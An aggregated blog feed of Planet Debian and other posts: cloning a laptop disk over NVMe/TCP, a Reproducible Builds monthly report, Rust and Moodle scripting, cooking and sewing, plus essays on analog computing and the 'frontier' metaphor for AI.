I started a new team debian-matomo-maintainers. Within this team all matomo related packages should be handled. PHP PEAR or PECL packages shall be still maintained in their corresponding teams.

This month I uploaded:

This work is generously funded by Freexian!

Debian Astro

This month I uploaded a new upstream version of:

Debian IoT

This month I uploaded new upstream versions of:

Planet DebianVasudev Kamath: Cloning a laptop over NVME TCP

Recently, I got a new laptop and had to set it up so I could start using it. But I wasn't really in the mood to go through the same old steps which I had explained in this post earlier. I was complaining about this to my colleague, and there came the suggestion of why not copy the entire disk to the new laptop. Though it sounded like an interesting idea to me, I had my doubts, so here is what I told him in return.

  1. I don't have the tools to open my old laptop and connect the new disk over USB to my new laptop.
  2. I use full disk encryption, and my old laptop has a 512GB disk, whereas the new laptop has a 1TB NVME, and I'm not so familiar with resizing LUKS.

He promptly suggested both could be done. For step 1, just expose the disk using NVME over TCP and connect it over the network and do a full disk copy, and the rest is pretty simple to achieve. In short, he suggested the following:

  1. Export the disk using nvmet-tcp from the old laptop.
  2. Do a disk copy to the new laptop.
  3. Resize the partition to use the full 1TB.
  4. Resize LUKS.
  5. Finally, resize the BTRFS root disk.

Exporting Disk over NVME TCP

The easiest way suggested by my colleague to do this is using systemd-storagetm.service. This service can be invoked by simply booting into storage-target-mode.target by specifying rd.systemd.unit=storage-target-mode.target. But he suggested not to use this as I need to tweak the dracut initrd image to involve network services as well as configuring WiFi from this mode is a painful thing to do.

So alternatively, I simply booted both my laptops with GRML rescue CD. And the following step was done to export the NVME disk on my current laptop using the nvmet-tcp module of Linux:

modprobe nvmet-tcp
cd /sys/kernel/config/nvmet
mkdir ports/0
cd ports/0
echo "ipv4" > addr_adrfam
echo 0.0.0.0 > addr_traaddr
echo 4420 > addr_trsvcid
echo tcp > addr_trtype

cd /sys/kernel/config/nvmet/subsystems
mkdir testnqn
echo 1 >testnqn/allow_any_host
mkdir testnqn/namespaces/1

cd testnqn
# replace the device name with the disk you want to export
echo "/dev/nvme0n1" > namespaces/1/device_path
echo 1 > namespaces/1/enable

ln -s "../../subsystems/testnqn" /sys/kernel/config/nvmet/ports/0/subsystems/testnqn

These steps ensure that the device is now exported using NVME over TCP. The next step is to detect this on the new laptop and connect the device:

nvme discover -t tcp -a <ip> -s 4420
nvme connectl-all -t tcp -a <> -s 4420

Finally, nvme list shows the device which is connected to the new laptop, and we can proceed with the next step, which is to do the disk copy.

Copying the Disk

I simply used the dd command to copy the root disk to my new laptop. Since the new laptop didn't have an Ethernet port, I had to rely only on WiFi, and it took about 7 and a half hours to copy the entire 512GB to the new laptop. The speed at which I was copying was about 18-20MB/s. The other option would have been to create an initial partition and file system and do an rsync of the root disk or use BTRFS itself for file system transfer.

dd if=/dev/nvme2n1 of=/dev/nvme0n1 status=progress bs=40M

Resizing Partition and LUKS Container

The final part was very easy. When I launched parted, it detected that the partition table does not match the disk size and asked if it can fix it, and I said yes. Next, I had to install cloud-guest-utils to get growpart to fix the second partition, and the following command extended the partition to the full 1TB:

growpart /dev/nvem0n1 p2

Next, I used cryptsetup-resize to increase the LUKS container size.

cryptsetup luksOpen /dev/nvme0n1p2 ENC
cryptsetup resize ENC

Finally, I rebooted into the disk, and everything worked fine. After logging into the system, I resized the BTRFS file system. BTRFS requires the system to be mounted for resize, so I could not attempt it in live boot.

btfs fielsystem resize max /

Conclussion

The only benefit of this entire process is that I have a new laptop, but I still feel like I'm using my existing laptop. Typically, setting up a new laptop takes about a week or two to completely get adjusted, but in this case, that entire time is saved.

An added benefit is that I learned how to export disks using NVME over TCP, thanks to my colleague. This new knowledge adds to the value of the experience.

365 TomorrowsSowing Seeds in Digital Soil

Author: Aspen Greenwood In a world gasping under the heavy cloak of pollution, the Catalogers—scientists driven by a mission—trekked through dwindling patches of green. Among them, Maya, whose spirit yearned for the vibrant Earth imprisoned in old, faded textbooks, delved into her work with a quiet, burning intensity. Each day, Maya and her team, respirators […]

The post Sowing Seeds in Digital Soil appeared first on 365tomorrows.

David BrinMore science! - from AI to analog to human nature

We're about to dive into AI (what else?) But first off, a little news from entertainment and philosophy ... and where both venn-overlap with myth

Here's a link to a recording of the first public performance of my play “The Escape,” on November 7 at Caltech. A 'reading' but fully dramatized, well-acted and directed by Joanne Doyle. The recording is of middling quality, but shows great audience reactions. Come have some good, impudently theological fun!  

(Note, for copyright reasons the video omits background music after scene 2 (The Stones “Sympathy for the Devil;”) and at the end, when you see the audience cheering silently during “You Gotta Have Heart!” the great song from Damn Yankees, that's related to the theme of the play. 


Pity! Still, folks liked it. And I think you’ll laugh a few times… or go “Huh!”)



== A world of analog… ==


Before going to digital revolutions, might there come a return of analog computing? 

Bringing back analog computers in much more advanced forms than their historic ancestors will change the world of computing drastically and forever.” 

This article makes a point I depicted in Infinity’s Shore – that analog computing may yet find a place. Indeed, the more we learn about neurons, the less their operation looks like simple, binary flip-flops. 

For every flashy, on-off synapse, there appear to be hundreds – even thousands – of tiny organelles that perform murky, nonlinear computational (or voting) functions, with some evidence for the Penrose-Hameroff notion that some of them use quantum entanglement!

Says one of the few pioneers in analog-on-a-chip: “Digital computers are very good at scalability. Analog is very good at complex interactions between variables. In the future, we may combine these advantages.”


Which brings us back to my novel - Infinity's Shore - wherein a hidden interstellar colony of ‘illegal immigrant’ refugees develops analog computers in order to avoid a posited ‘inevitable detectability’ of digital computation. A plot device, sure. But it freed me to envision a vast chamber filled with spinning glass disks and cams and sparking tubes. A vivid Frankenstein contraption of… analog.

 

== AI, Ai AI!! ==

 

We just got back from Ben Goertzel's conference on “Beneficial AGI” in Panama. How can we encourage a 'landing' so that organic and artificial minds will be mutually beneficent? Quite a group was there with interesting perspectives on these new life forms. Exchanged ideas... 


...including the highly unusual ones from my WIRED article that breaks free of the three standard 'AI-formats' that can only lead to disaster, suggesting instead a 4th! That AI entities can only be held accountable if they have individuality... even 'soul'... 


Heck, still highly relevant: my NEWSWEEK op-ed (June'22) dealt with 'empathy bots'' that feign sapience and personhood.  


Offering some context for this new type of life form, Byron Reese has a new book: “We Are Agora: How Humanity Functions as a Single Superorganism That Shapes Our World and Our Future.”  We desperately need the wary, can-do optimism that he conveyed in earlier books – along with confidence persuaders like Steven Pinker and Peter Diamandis! Only now BP talks about Gaia, Lovelock, Margulis and all that… how life is a web of nested levels of individuality and macro communities, e.g. from cells to a bee to a hive and so on. Or YOUR cells to organs to ‘you’ to your families and communities and civilization. In other words – the core topic of my 1990 novel EARTH!  (Soon to be re-released in an even better version! ;-)

See Byron interviewed by Tim Ventura.

 

A paper on “Nepotistically Trained Generative-AI Models Collapse” asserts that – in what seems to be a case of back feedback loops - AI (artificial intelligence) image synthesis programs, when retrained on even small amounts of their own creation, produce highly distorted images… and that once poisoned, the models struggle to fully heal even after retraining on only real images.  I am sure it’ll get fixed - and probably has been, before this gets posted - but…. 

 

Oy!  Or shall I say aieee!”  This very clever Twitter troll has developed an interesting demonstration of recursive "poisoning." (link by Mike Godwin.)

 

But then we can gain insights into the past! 

 At the Direction of President Biden, Department of Commerce to Establish U.S. Artificial Intelligence Safety Institute to Lead Efforts on AI Safety. Through the National Institute of Standards and Technology (NIST),  the U.S. Artificial Intelligence Safety Institute (USAISI) will lead the U.S. government’s efforts on AI safety and trust, particularly for evaluating the most advanced AI models. “USAISI will facilitate the development of standards for safety, security, and testing of AI models, develop standards for authenticating AI-generated content, and provide testing environments for researchers to evaluate emerging AI risks and address known impacts.”


== Insights into human nature ==

 

Caltech researchers developed a way to read brain activity using functional ultrasound (fUS), a much less invasive technique than neural link implants and does not require constant recalibration.  Only… um… “Because the skull itself is not permeable to sound waves, using ultrasound for brain imaging requires a transparent “window” to be installed into the skull.


A researcher wrote about his shock after discovering that some people don't have inner speech. Many folks have an internal monologue that is constantly commenting on everything they do, whereas others produce only small snippets of inner speech here and there, as they go about their day.  But some report a complete absence. The article asks what's going on inside the heads of people who don't have inner speech?


Ask those and other unusual questions! In The Ancient Ones I comment about those human beings who, teetering at the edge of a sneeze, do NOT look for a sharp, bright light to stare into. Such people exist… and they almost all think we light-starers are lying! Yeah, we smooth apes are a varied bunch.


== And finally ==


The Talmudic rabbis recognized six genders that were neither purely male nor female. Among these: 


- Androgynos, having both male and female characteristics.

- Tumtum, lacking sexual characteristics.

- Aylonit hamah, identified female at birth but later naturally developing male characteristics.

- Aylonit adam, identified female at birth but later developing male characteristics through human intervention. And so on.

They also had a tradition that the first human being was both.


A laudable acceptance we can all learn from! Of course, they also taught against the dangers of excessive, self-righteous sanctimony. Those who sow deliberate insult and contention in their own house (or family, or coalition of well-meaning allies) inherit... the wind.


Planet DebianValhalla's Things: Low Fat, No Eggs, Lasagna-ish

Posted on March 10, 2024
Tags: madeof:atoms, craft:cooking

A few notes on what we had for lunch, to be able to repeat it after the summer.

There were a number of food intolerance related restrictions which meant that the traditional lasagna recipe wasn’t an option; the result still tasted good, but it was a bit softer and messier to take out of the pan and into the dishes.

On Saturday afternoon we made fresh no-egg pasta with 200 g (durum) flour and 100 g water, after about 1 hour it was divided in 6 parts and rolled to thickness #6 on the pasta machine.

Meanwhile, about 500 ml of low fat almost-ragù-like meat sauce was taken out of the freezer: this was a bit too little, 750 ml would have been better.

On Saturday evening we made a sauce with 1 l of low-fat milk and 80 g of flour, and the meat sauce was heated up.

Then everything was put in a 28 cm × 23 cm pan, with 6 layers of pasta and 7 layers of the two sauces, and left to cool down.

And on Sunday morning it was baked for 35 min in the oven at 180 °C.

With 3 people we only had about two thirds of it.

Next time I think we should try to use 400 - 500 g of flour (so that it’s easier to work by machine), 2 l of milk, 1.5 l of meat sauce and divide it into 3 pans: one to eat the next day and two to freeze (uncooked) for another day.

No pictures, because by the time I thought about writing a post we were already more than halfway through eating it :)

,

Planet DebianReproducible Builds: Reproducible Builds in February 2024

Welcome to the February 2024 report from the Reproducible Builds project! In our reports, we try to outline what we have been up to over the past month as well as mentioning some of the important things happening in software supply-chain security.


Reproducible Builds at FOSDEM 2024

Core Reproducible Builds developer Holger Levsen presented at the main track at FOSDEM on Saturday 3rd February this year in Brussels, Belgium. However, that wasn’t the only talk related to Reproducible Builds.

However, please see our comprehensive FOSDEM 2024 news post for the full details and links.


Maintainer Perspectives on Open Source Software Security

Bernhard M. Wiedemann spotted that a recent report entitled Maintainer Perspectives on Open Source Software Security written by Stephen Hendrick and Ashwin Ramaswami of the Linux Foundation sports an infographic which mentions that “56% of [polled] projects support reproducible builds”.


A total of three separate scholarly papers related to Reproducible Builds have appeared this month:

Signing in Four Public Software Package Registries: Quantity, Quality, and Influencing Factors by Taylor R. Schorlemmer, Kelechi G. Kalu, Luke Chigges, Kyung Myung Ko, Eman Abdul-Muhd, Abu Ishgair, Saurabh Bagchi, Santiago Torres-Arias and James C. Davis (Purdue University, Indiana, USA) is concerned with the problem that:

Package maintainers can guarantee package authorship through software signing [but] it is unclear how common this practice is, and whether the resulting signatures are created properly. Prior work has provided raw data on signing practices, but measured single platforms, did not consider time, and did not provide insight on factors that may influence signing. We lack a comprehensive, multi-platform understanding of signing adoption and relevant factors. This study addresses this gap. (arXiv, full PDF)


Reproducibility of Build Environments through Space and Time by Julien Malka, Stefano Zacchiroli and Théo Zimmermann (Institut Polytechnique de Paris, France) addresses:

[The] principle of reusability […] makes it harder to reproduce projects’ build environments, even though reproducibility of build environments is essential for collaboration, maintenance and component lifetime. In this work, we argue that functional package managers provide the tooling to make build environments reproducible in space and time, and we produce a preliminary evaluation to justify this claim.

The abstract continues with the claim that “Using historical data, we show that we are able to reproduce build environments of about 7 million Nix packages, and to rebuild 99.94% of the 14 thousand packages from a 6-year-old Nixpkgs revision. (arXiv, full PDF)


Options Matter: Documenting and Fixing Non-Reproducible Builds in Highly-Configurable Systems by Georges Aaron Randrianaina, Djamel Eddine Khelladi, Olivier Zendra and Mathieu Acher (Inria centre at Rennes University, France):

This paper thus proposes an approach to automatically identify configuration options causing non-reproducibility of builds. It begins by building a set of builds in order to detect non-reproducible ones through binary comparison. We then develop automated techniques that combine statistical learning with symbolic reasoning to analyze over 20,000 configuration options. Our methods are designed to both detect options causing non-reproducibility, and remedy non-reproducible configurations, two tasks that are challenging and costly to perform manually. (HAL Portal, full PDF)


Mailing list highlights

From our mailing list this month:


Distribution work

In Debian this month, 5 reviews of Debian packages were added, 22 were updated and 8 were removed this month adding to Debian’s knowledge about identified issues. A number of issue types were updated as well. […][…][…][…] In addition, Roland Clobus posted his 23rd update of the status of reproducible ISO images on our mailing list. In particular, Roland helpfully summarised that “all major desktops build reproducibly with bullseye, bookworm, trixie and sid provided they are built for a second time within the same DAK run (i.e. [within] 6 hours)” and that there will likely be further work at a MiniDebCamp in Hamburg. Furthermore, Roland also responded in-depth to a query about a previous report


Fedora developer Zbigniew Jędrzejewski-Szmek announced a work-in-progress script called fedora-repro-build that attempts to reproduce an existing package within a koji build environment. Although the projects’ README file lists a number of “fields will always or almost always vary” and there is a non-zero list of other known issues, this is an excellent first step towards full Fedora reproducibility.


Jelle van der Waa introduced a new linter rule for Arch Linux packages in order to detect cache files leftover by the Sphinx documentation generator which are unreproducible by nature and should not be packaged. At the time of writing, 7 packages in the Arch repository are affected by this.


Elsewhere, Bernhard M. Wiedemann posted another monthly update for his work elsewhere in openSUSE.


diffoscope

diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made a number of changes such as uploading versions 256, 257 and 258 to Debian and made the following additional changes:

  • Use a deterministic name instead of trusting gpg’s –use-embedded-filenames. Many thanks to Daniel Kahn Gillmor dkg@debian.org for reporting this issue and providing feedback. [][]
  • Don’t error-out with a traceback if we encounter struct.unpack-related errors when parsing Python .pyc files. (#1064973). []
  • Don’t try and compare rdb_expected_diff on non-GNU systems as %p formatting can vary, especially with respect to MacOS. []
  • Fix compatibility with pytest 8.0. []
  • Temporarily fix support for Python 3.11.8. []
  • Use the 7zip package (over p7zip-full) after a Debian package transition. (#1063559). []
  • Bump the minimum Black source code reformatter requirement to 24.1.1+. []
  • Expand an older changelog entry with a CVE reference. []
  • Make test_zip black clean. []

In addition, James Addison contributed a patch to parse the headers from the diff(1) correctly [][] — thanks! And lastly, Vagrant Cascadian pushed updates in GNU Guix for diffoscope to version 255, 256, and 258, and updated trydiffoscope to 67.0.6.


reprotest

reprotest is our tool for building the same source code twice in different environments and then checking the binaries produced by each build for any differences. This month, Vagrant Cascadian made a number of changes, including:

  • Create a (working) proof of concept for enabling a specific number of CPUs. [][]
  • Consistently use 398 days for time variation rather than choosing randomly and update README.rst to match. [][]
  • Support a new --vary=build_path.path option. [][][][]


Website updates

There were made a number of improvements to our website this month, including:


Reproducibility testing framework

The Reproducible Builds project operates a comprehensive testing framework (available at tests.reproducible-builds.org) in order to check packages and other artifacts for reproducibility. In February, a number of changes were made by Holger Levsen:

  • Debian-related changes:

    • Temporarily disable upgrading/bootstrapping Debian unstable and experimental as they are currently broken. [][]
    • Use the 64-bit amd64 kernel on all i386 nodes; no more 686 PAE kernels. []
    • Add an Erlang package set. []
  • Other changes:

    • Grant Jan-Benedict Glaw shell access to the Jenkins node. []
    • Enable debugging for NetBSD reproducibility testing. []
    • Use /usr/bin/du --apparent-size in the Jenkins shell monitor. []
    • Revert “reproducible nodes: mark osuosl2 as down”. []
    • Thanks again to Codethink, for they have doubled the RAM on our arm64 nodes. []
    • Only set /proc/$pid/oom_score_adj to -1000 if it has not already been done. []
    • Add the opemwrt-target-tegra and jtx task to the list of zombie jobs. [][]

Vagrant Cascadian also made the following changes:

  • Overhaul the handling of OpenSSH configuration files after updating from Debian bookworm. [][][]
  • Add two new armhf architecture build nodes, virt32z and virt64z, and insert them into the Munin monitoring. [][] [][]

In addition, Alexander Couzens updated the OpenWrt configuration in order to replace the tegra target with mpc85xx [], Jan-Benedict Glaw updated the NetBSD build script to use a separate $TMPDIR to mitigate out of space issues on a tmpfs-backed /tmp [] and Zheng Junjie added a link to the GNU Guix tests [].

Lastly, node maintenance was performed by Holger Levsen [][][][][][] and Vagrant Cascadian [][][][].


Upstream patches

The Reproducible Builds project detects, dissects and attempts to fix as many currently-unreproducible packages as possible. We endeavour to send all of our patches upstream where appropriate. This month, we wrote a large number of such patches, including:



If you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. However, you can get in touch with us via:

Planet DebianIustin Pop: Finally learning some Rust - hello photo-backlog-exporter!

After 4? 5? or so years of wanting to learn Rust, over the past 4 or so months I finally bit the bullet and found the motivation to write some Rust. And the subject.

And I was, and still am, thoroughly surprised. It’s like someone took Haskell, simplified it to some extents, and wrote a systems language out of it. Writing Rust after Haskell seems easy, and pleasant, and you:

  • don’t have to care about unintended laziness which causes memory “leaksâ€� (stuck memory, more like).
  • don’t have to care about GC eating too much of your multi-threaded RTS.
  • can be happy that there’s lots of activity and buzz around the language.
  • can be happy for generating very small, efficient binaries that feel right at home on Raspberry Pi, especially not the 5.
  • are very happy that error handling is done right (Option and Result, not like Go…)

On the other hand:

  • there are no actual monads; the ? operator kind-of-looks-like being in do blocks, but only and only for Option and Result, sadly.
  • there’s no Stackage, it’s like having only Hackage available, and you can hope all packages work together well.
  • most packaging is designed to work only against upstream/online crates.io, so offline packaging is doable but not “nativeâ€� (from what I’ve seen).

However, overall, one can clearly see there’s more movement in Rust, and the quality of some parts of the toolchain is better (looking at you, rust-analyzer, compared to HLS).

So, with that, I’ve just tagged photo-backlog-exporter v0.1.0. It’s a port of a Python script that was run as a textfile collector, which meant updates every ~15 minutes, since it was a bit slow to start, which I then rewrote in Go (but I don’t like Go the language, plus the GC - if I have to deal with a GC, I’d rather write Haskell), then finally rewrote in Rust.

What does this do? It exports metrics for Prometheus based on the count, age and distribution of files in a directory. These files being, for me, the pictures I still have to sort, cull and process, because I never have enough free time to clear out the backlog. The script is kind of designed to work together with Corydalis, but since it doesn’t care about file content, it can also double (easily) as simple “file count/age exporter�.

And to my surprise, writing in Rust is soo pleasant, that the feature list is greater than the original Python script, and - compared to that untested script - I’ve rather easily achieved a very high coverage ratio. Rust has multiple types of tests, and the combination allows getting pretty down to details on testing:

  • region coverage: >80%
  • function coverage: >89% (so close here!)
  • line coverage: >95%

I had to combine a (large) number of testing crates to get it expressive enough, but it was worth the effort. The last find from yesterday, assert_cmd, is excellent to describe testing/assertion in Rust itself, rather than via a separate, new DSL, like I was using shelltest for, in Haskell.

To some extent, I feel like I found the missing arrow in the quiver. Haskell is good, quite very good for some type of workloads, but of course not all, and Rust complements that very nicely, with lots of overlap (as expected). Python can fill in any quick-and-dirty scripting needed. And I just need to learn more frontend, specifically Typescript (the language, not referring to any specific libraries/frameworks), and I’ll be ready for AI to take over coding 😅…

So, for now, I’ll need to split my free time coding between all of the above, and keep exercising my skills. But so glad to have found a good new language!

365 Tomorrows12 Steps

Author: Janice Cyntje Alfonso stood near the podium of his community center’s conference room and waivered. Although he was grateful that his niece had invited him to speak at this 12-step support group, he was nevertheless cautious of the emotional fallout from airing his life’s dirty laundry. Beads of perspiration trickled down his brows as […]

The post 12 Steps appeared first on 365tomorrows.

Planet DebianValhalla's Things: Elastic Neck Top Two: MOAR Ruffles

Posted on March 9, 2024
Tags: madeof:atoms, craft:sewing, FreeSoftWear

A woman wearing a white top with a wide neck with ruffles and puffy sleeves that are gathered at the cuff. The top is tucked in the trousers to gather the fullness at the waist.

After making my Elastic Neck Top I knew I wanted to make another one less constrained by the amount of available fabric.

I had a big cut of white cotton voile, I bought some more swimsuit elastic, and I also had a spool of n°100 sewing cotton, but then I postponed the project for a while I was working on other things.

Then FOSDEM 2024 arrived, I was going to remote it, and I was working on my Augusta Stays, but I knew that in the middle of FOSDEM I risked getting to the stage where I needed to leave the computer to try the stays on: not something really compatible with the frenetic pace of a FOSDEM weekend, even one spent at home.

I needed a backup project1, and this was perfect: I already had everything I needed, the pattern and instructions were already on my site (so I didn’t need to take pictures while working), and it was mostly a lot of straight seams, perfect while watching conference videos.

So, on the Friday before FOSDEM I cut all of the pieces, then spent three quarters of FOSDEM on the stays, and when I reached the point where I needed to stop for a fit test I started on the top.

Like the first one, everything was sewn by hand, and one week after I had started everything was assembled, except for the casings for the elastic at the neck and cuffs, which required about 10 km of sewing, and even if it was just a running stitch it made me want to reconsider my lifestyle choices a few times: there was really no reason for me not to do just those seams by machine in a few minutes.

Instead I kept sewing by hand whenever I had time for it, and on the next weekend it was ready. We had a rare day of sun during the weekend, so I wore my thermal underwear, some other layer, a scarf around my neck, and went outside with my SO to have a batch of pictures taken (those in the jeans posts, and others for a post I haven’t written yet. Have I mentioned I have a backlog?).

And then the top went into the wardrobe, and it will come out again when the weather will be a bit warmer. Or maybe it will be used under the Augusta Stays, since I don’t have a 1700 chemise yet, but that requires actually finishing them.

The pattern for this project was already online, of course, but I’ve added a picture of the casing to the relevant section, and everything is as usual #FreeSoftWear.


  1. yes, I could have worked on some knitting WIP, but lately I’m more in a sewing mood.↩︎

,

Planet DebianLouis-Philippe Véronneau: Acts of active procrastination: example of a silly Python script for Moodle

My brain is currently suffering from an overload caused by grading student assignments.

In search of a somewhat productive way to procrastinate, I thought I would share a small script I wrote sometime in 2023 to facilitate my grading work.

I use Moodle for all the classes I teach and students use it to hand me out their papers. When I'm ready to grade them, I download the ZIP archive Moodle provides containing all their PDF files and comment them using xournalpp and my Wacom tablet.

Once this is done, I have a directory structure that looks like this:

Assignment FooBar/
├── Student A_21100_assignsubmission_file
│   ├── graded paper.pdf
│   ├── Student A's perfectly named assignment.pdf
│   └── Student A's perfectly named assignment.xopp
├── Student B_21094_assignsubmission_file
│   ├── graded paper.pdf
│   ├── Student B's perfectly named assignment.pdf
│   └── Student B's perfectly named assignment.xopp
├── Student C_21093_assignsubmission_file
│   ├── graded paper.pdf
│   ├── Student C's perfectly named assignment.pdf
│   └── Student C's perfectly named assignment.xopp
⋮

Before I can upload files back to Moodle, this directory needs to be copied (I have to keep the original files), cleaned of everything but the graded paper.pdf files and compressed in a ZIP.

You can see how this can quickly get tedious to do by hand. Not being a complete tool, I often resorted to crafting a few spurious shell one-liners each time I had to do this1. Eventually I got tired of ctrl-R-ing my shell history and wrote something reusable.

Behold this script! When I began writing this post, I was certain I had cheaped out on my 2021 New Year's resolution and written it in Shell, but glory!, it seems I used a proper scripting language instead.

#!/usr/bin/python3

# Copyright (C) 2023, Louis-Philippe Véronneau <pollo@debian.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

"""
This script aims to take a directory containing PDF files exported via the
Moodle mass download function, remove everything but the final files to submit
back to the students and zip it back.

usage: ./moodle-zip.py <target_dir>
"""

import os
import shutil
import sys
import tempfile

from fnmatch import fnmatch


def sanity(directory):
    """Run sanity checks before doing anything else"""
    base_directory = os.path.basename(os.path.normpath(directory))
    if not os.path.isdir(directory):
        sys.exit(f"Target directory {directory} is not a valid directory")
    if os.path.exists(f"/tmp/{base_directory}.zip"):
        sys.exit(f"Final ZIP file path '/tmp/{base_directory}.zip' already exists")
    for root, dirnames, _ in os.walk(directory):
        for dirname in dirnames:
            corrige_present = False
            for file in os.listdir(os.path.join(root, dirname)):
                if fnmatch(file, 'graded paper.pdf'):
                    corrige_present = True
            if corrige_present is False:
                sys.exit(f"Directory {dirname} does not contain a 'graded paper.pdf' file")


def clean(directory):
    """Remove superfluous files, to keep only the graded PDF"""
    with tempfile.TemporaryDirectory() as tmp_dir:
        shutil.copytree(directory, tmp_dir, dirs_exist_ok=True)
        for root, _, filenames in os.walk(tmp_dir):
            for file in filenames:
                if not fnmatch(file, 'graded paper.pdf'):
                    os.remove(os.path.join(root, file))
        compress(tmp_dir, directory)


def compress(directory, target_dir):
    """Compress directory into a ZIP file and save it to the target dir"""
    target_dir = os.path.basename(os.path.normpath(target_dir))
    shutil.make_archive(f"/tmp/{target_dir}", 'zip', directory)
    print(f"Final ZIP file has been saved to '/tmp/{target_dir}.zip'")


def main():
    """Main function"""
    target_dir = sys.argv[1]
    sanity(target_dir)
    clean(target_dir)


if __name__ == "__main__":
    main()

If for some reason you happen to have a similar workflow as I and end up using this script, hit me up?

Now, back to grading...


  1. If I recall correctly, the lazy way I used to do it involved copying the directory, renaming the extension of the graded paper.pdf files, deleting all .pdf and .xopp files using find and changing graded paper.foobar back to a PDF. Some clever regex or learning awk from the ground up could've probably done the job as well, but you know, that would have required using my brain and spending spoons... 

Cryptogram Essays from the Second IWORD

Cryptogram How the “Frontier” Became the Slogan of Uncontrolled AI

Artificial intelligence (AI) has been billed as the next frontier of humanity: the newly available expanse whose exploration will drive the next era of growth, wealth, and human flourishing. It’s a scary metaphor. Throughout American history, the drive for expansion and the very concept of terrain up for grabs—land grabs, gold rushes, new frontiers—have provided a permission structure for imperialism and exploitation. This could easily hold true for AI.

This isn’t the first time the concept of a frontier has been used as a metaphor for AI, or technology in general. As early as 2018, the powerful foundation models powering cutting-edge applications like chatbots have been called “frontier AI.” In previous decades, the internet itself was considered an electronic frontier. Early cyberspace pioneer John Perry Barlow wrote “Unlike previous frontiers, this one has no end.” When he and others founded the internet’s most important civil liberties organization, they called it the Electronic Frontier Foundation.

America’s experience with frontiers is fraught, to say the least. Expansion into the Western frontier and beyond has been a driving force in our country’s history and identity—and has led to some of the darkest chapters of our past. The tireless drive to conquer the frontier has directly motivated some of this nation’s most extreme episodes of racism, imperialism, violence, and exploitation.

That history has something to teach us about the material consequences we can expect from the promotion of AI today. The race to build the next great AI app is not the same as the California gold rush. But the potential that outsize profits will warp our priorities, values, and morals is, unfortunately, analogous.

Already, AI is starting to look like a colonialist enterprise. AI tools are helping the world’s largest tech companies grow their power and wealth, are spurring nationalistic competition between empires racing to capture new markets, and threaten to supercharge government surveillance and systems of apartheid. It looks more than a bit like the competition among colonialist state and corporate powers in the seventeenth century, which together carved up the globe and its peoples. By considering America’s past experience with frontiers, we can understand what AI may hold for our future, and how to avoid the worst potential outcomes.

America’s “Frontier” Problem

For 130 years, historians have used frontier expansion to explain sweeping movements in American history. Yet only for the past thirty years have we generally acknowledged its disastrous consequences.

Frederick Jackson Turner famously introduced the frontier as a central concept for understanding American history in his vastly influential 1893 essay. As he concisely wrote, “American history has been in a large degree the history of the colonization of the Great West.”

Turner used the frontier to understand all the essential facts of American life: our culture, way of government, national spirit, our position among world powers, even the “struggle” of slavery. The endless opportunity for westward expansion was a beckoning call that shaped the American way of life. Per Turner’s essay, the frontier resulted in the individualistic self-sufficiency of the settler and gave every (white) man the opportunity to attain economic and political standing through hardscrabble pioneering across dangerous terrain.The New Western History movement, gaining steam through the 1980s and led by researchers like Patricia Nelson Limerick, laid plain the racial, gender, and class dynamics that were always inherent to the frontier narrative. This movement’s story is one where frontier expansion was a tool used by the white settler to perpetuate a power advantage.The frontier was not a siren calling out to unwary settlers; it was a justification, used by one group to subjugate another. It was always a convenient, seemingly polite excuse for the powerful to take what they wanted. Turner grappled with some of the negative consequences and contradictions of the frontier ethic and how it shaped American democracy. But many of those whom he influenced did not do this; they celebrated it as a feature, not a bug. Theodore Roosevelt wrote extensively and explicitly about how the frontier and his conception of white supremacy justified expansion to points west and, through the prosecution of the Spanish-American War, far across the Pacific. Woodrow Wilson, too, celebrated the imperial loot from that conflict in 1902. Capitalist systems are “addicted to geographical expansion” and even, when they run out of geography, seek to produce new kinds of spaces to expand into. This is what the geographer David Harvey calls the “spatial fix.”Claiming that AI will be a transformative expanse on par with the Louisiana Purchase or the Pacific frontiers is a bold assertion—but increasingly plausible after a year dominated by ever more impressive demonstrations of generative AI tools. It’s a claim bolstered by billions of dollars in corporate investment, by intense interest of regulators and legislators worldwide in steering how AI is developed and used, and by the variously utopian or apocalyptic prognostications from thought leaders of all sectors trying to understand how AI will shape their sphere—and the entire world.

AI as a Permission Structure

Like the western frontier in the nineteenth century, the maniacal drive to unlock progress via advancement in AI can become a justification for political and economic expansionism and an excuse for racial oppression.

In the modern day, OpenAI famously paid dozens of Kenyans little more than a dollar an hour to process data used in training their models underlying products such as ChatGPT. Paying low wages to data labelers surely can’t be equated to the chattel slavery of nineteenth-century America. But these workers did endure brutal conditions, including being set to constantly review content with “graphic scenes of violence, self-harm, murder, rape, necrophilia, child abuse, bestiality, and incest.” There is a global market for this kind of work, which has been essential to the most important recent advances in AI such as Reinforcement Learning with Human Feedback, heralded as the most important breakthrough of ChatGPT.

The gold rush mentality associated with expansion is taken by the new frontiersmen as permission to break the rules, and to build wealth at the expense of everyone else. In 1840s California, gold miners trespassed on public lands and yet were allowed to stake private claims to the minerals they found, and even to exploit the water rights on those lands. Again today, the game is to push the boundaries on what rule-breaking society will accept, and hope that the legal system can’t keep up.

Many internet companies have behaved in exactly the same way since the dot-com boom. The prospectors of internet wealth lobbied for, or simply took of their own volition, numerous government benefits in their scramble to capture those frontier markets. For years, the Federal Trade Commission has looked the other way or been lackadaisical in halting antitrust abuses by Amazon, Facebook, and Google. Companies like Uber and Airbnb exploited loopholes in, or ignored outright, local laws on taxis and hotels. And Big Tech platforms enjoyed a liability shield that protected them from punishment the contents people posted to their sites.

We can already see this kind of boundary pushing happening with AI.

Modern frontier AI models are trained using data, often copyrighted materials, with untested legal justification. Data is like water for AI, and, like the fight over water rights in the West, we are repeating a familiar process of public acquiescence to private use of resources. While some lawsuits are pending, so far AI companies have faced no significant penalties for the unauthorized use of this data.

